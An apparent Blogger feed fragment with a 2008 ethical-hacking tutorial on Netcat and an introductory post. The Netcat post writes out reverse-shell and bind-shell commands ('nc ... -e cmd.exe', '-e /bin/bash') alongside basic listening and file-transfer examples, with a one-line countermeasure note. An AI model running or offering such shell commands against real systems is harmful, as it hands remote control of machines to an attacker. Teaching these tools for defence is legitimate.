src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_IYfuPD9qO24/SHee9ovjbmI/AAAAAAAAABQ/Fy1FNu22okI/s72-c/etcap.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-34622613099897518</id><published>2008-07-10T15:22:00.020-04:00</published><updated>2008-07-28T15:07:26.342-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Netcat'/><title type='text'>The Yin and Yang of NetCat</title><content type='html'>&lt;span style="FONT-WEIGHT: bold;font-size:130%;" &gt;Netcat&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;is a great tool that works on Windows and Linux. It can do the following:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;port redirection,&lt;br /&gt;&lt;/li&gt;&lt;li&gt;uploading and downloading of files&lt;br /&gt;&lt;/li&gt;&lt;li&gt;listening on a port of your choosing&lt;br /&gt;&lt;/li&gt;&lt;li&gt;simple chat&lt;br /&gt;&lt;/li&gt;&lt;li&gt;port scanning&lt;br /&gt;&lt;/li&gt;&lt;li&gt;backdoors&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;I am going to show some examples on how to use this tool.&lt;br /&gt;&lt;br /&gt;Listening on a port is as easy as using the following command.&lt;/tab&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;nc -lvvp 80&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;nc netcat&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;-l listen mode&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;-vv very verbose&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;-p port 80&lt;/strong&gt; &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;tab&gt;&lt;tab&gt;Connecting to a port with netcat is great for banner grabbing. 
This can be done with the following commands&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;nc -vv 192.168.0.1 23&lt;br /&gt;nc netcat&lt;br /&gt;-vv very verbose&lt;br /&gt;ip&lt;br /&gt;port &lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Uploading a file uses the command as earlier just use Greater and Less Than.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;nc -lv 4444 &gt;netcat.txt&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;nc -v 192.168.0.198 &lt;&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Sending a reverse shell&lt;br /&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;nc -v 192.168.0.198 4444 -e &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_0"&gt;cmd&lt;/span&gt;.&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_1"&gt;exe&lt;/span&gt; &lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;&lt;span class="blsp-spelling-error" id="SPELLING_ERROR_2"&gt;nc&lt;/span&gt; -v 192.168.0.198 4444 -e /bin/bash &lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Listening with a command shell&lt;br /&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;nc -lv 4444 -e cmd.exe &lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;nc -lv 4444 -e /bin/bash &lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span style="FONT-WEIGHT: bold;font-size:130%;" &gt;Countermeasure&lt;/tab&gt;&lt;/tab&gt;s&lt;/span&gt;&lt;span style="FONT-WEIGHT: bold"&gt; &lt;/span&gt;&lt;/p&gt;Preventing this type of tool can be done with antivirus, firewalls and IDS for the reverse shell. 
NetCat is a great tool for the ethical hacking arsenal.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/34622613099897518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=34622613099897518' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/34622613099897518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/34622613099897518'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/wonderful-world-of-netcat.html' title='The Yin and Yang of NetCat'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-2111562292035532616</id><published>2008-07-10T15:03:00.001-04:00</published><updated>2008-07-11T15:22:45.042-04:00</updated><title type='text'>First Post</title><content type='html'>Ok, First Post.&lt;br /&gt;&lt;br /&gt;I am setting this up as a personal database of useful information relating to my CCIE and Ethical Hacking studies. Some of the tools and scripts might be useful if you are in IT. Each post will showcase a type of attack and the countermeasure. 
Most of this will be settings to change and scripts written to execute the attack, along with pictures.&lt;br /&gt;&lt;br /&gt;I will show the attack and then the countermeasure to bring it into balance. I am going to include pictures and show in great detail how to execute the attack and then counter it. Feel free to use anything I post, as the tools will be open source and freely downloadable.&lt;br /&gt;&lt;br /&gt;Thanks&lt;br /&gt;HackThePlanet</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2111562292035532616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2111562292035532616'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/first-post.html' title='First Post'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author></entry></feed>
